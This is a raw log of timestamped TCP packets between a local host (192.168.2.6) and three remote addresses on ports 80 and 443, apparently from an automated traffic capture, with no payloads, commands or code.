                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572112083 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572151899 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.572782040 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.619792938 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.619940042 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.620059013 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.620080948 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:20.776487112 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123430014 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123478889 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123560905 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.123591900 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.138931036 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.139013052 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.139039993 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.148964882 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.149017096 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.149046898 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.159415960 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.159482956 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.159506083 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.172947884 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.173007011 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.173047066 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.186819077 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.187993050 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.188019991 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.244925022 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.244981050 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.245012999 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.253669024 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.253745079 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.253776073 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.316361904 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.316443920 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.316478968 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.324615955 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.328008890 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.328036070 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.332829952 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.332904100 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.332911968 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346244097 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346273899 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346896887 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.346906900 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.358351946 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.358403921 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.358412027 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.371989012 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.372073889 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.372081041 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.385668039 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.385736942 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.385745049 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.399605036 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.399683952 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.399691105 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.415098906 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.415158033 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.415174007 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.425879002 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.425931931 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.425939083 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.437602997 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.437640905 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.437649012 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.449549913 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.449594975 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.449604034 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.461608887 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.461651087 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.461661100 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466245890 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466427088 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466746092 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.473176003 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.473225117 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.473231077 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.512732983 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.512798071 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.512810946 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.515446901 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.515491962 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.515501022 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.525398970 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.525454044 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.198741913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.198846102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.198893070 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.207195044 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.207423925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.207509041 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.215354919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.215493917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.215550900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.223689079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.223843098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.223897934 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.232079983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.232273102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.232336044 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.240581989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.240969896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.241039991 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.248403072 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.248543024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.248615980 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.257503033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.257663012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.257761002 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.264343023 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.264357090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.264414072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.398200035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.398529053 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.398576975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.400918961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.401850939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.401916027 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.402043104 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.407202005 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.407267094 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.407337904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.412614107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.412669897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.412707090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.417870998 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.417916059 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.418168068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.423326969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.423464060 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.423486948 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.428769112 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.428833961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.428956032 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.433814049 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.433866978 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.433945894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.438971996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.439122915 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.439148903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.444268942 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.444364071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.444449902 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.447076082 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.447118998 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.447186947 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.449536085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.449656010 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.449667931 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.455148935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.455193996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.455207109 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.460200071 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.460277081 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.460356951 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.461487055 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.461510897 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.465516090 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.465653896 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.465801001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.470845938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.470994949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.471009970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.477911949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.478001118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.478008032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.481539011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.481581926 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.481648922 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.486677885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.486716032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.486805916 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.492022991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.492153883 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.492168903 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.497246027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.497323990 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.610208988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.610302925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.610347986 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.612145901 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.612298965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.612365007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.616657019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.616764069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.854317904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.857495070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.857656956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.858169079 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.859574080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.859679937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.859726906 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.861577034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.861742973 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.861788988 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.864018917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.864156961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.864217043 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.866524935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.866684914 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.866735935 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.869107962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.869195938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.869246960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.871520996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.871644020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.871840000 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.874296904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.874447107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.874500036 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.876539946 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.876655102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.876714945 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.879143953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.879259109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.879373074 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.881664038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.881791115 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.881858110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.884474993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.884572983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.884619951 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.886727095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.886889935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.886945963 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.889013052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.889272928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.889322996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.891489029 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.891649008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.891696930 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.894124031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.894437075 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.894490004 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.896677017 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.896800995 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.896904945 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.899060965 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.899171114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.899221897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.901520967 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.901631117 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.901685953 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.904485941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.904500008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.904588938 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.907535076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.907633066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.907788038 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.909657955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.909799099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.909847975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.911503077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.911627054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.911708117 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.914016962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.914150953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.914201975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.916578054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.916718006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.916939974 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.919224024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.919565916 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.919615030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.921705961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.921859026 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.921962023 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.923986912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.924140930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.924223900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.926497936 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.926640034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.926685095 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.929008961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.929135084 CET8049802139.99.188.124192.168.2.6
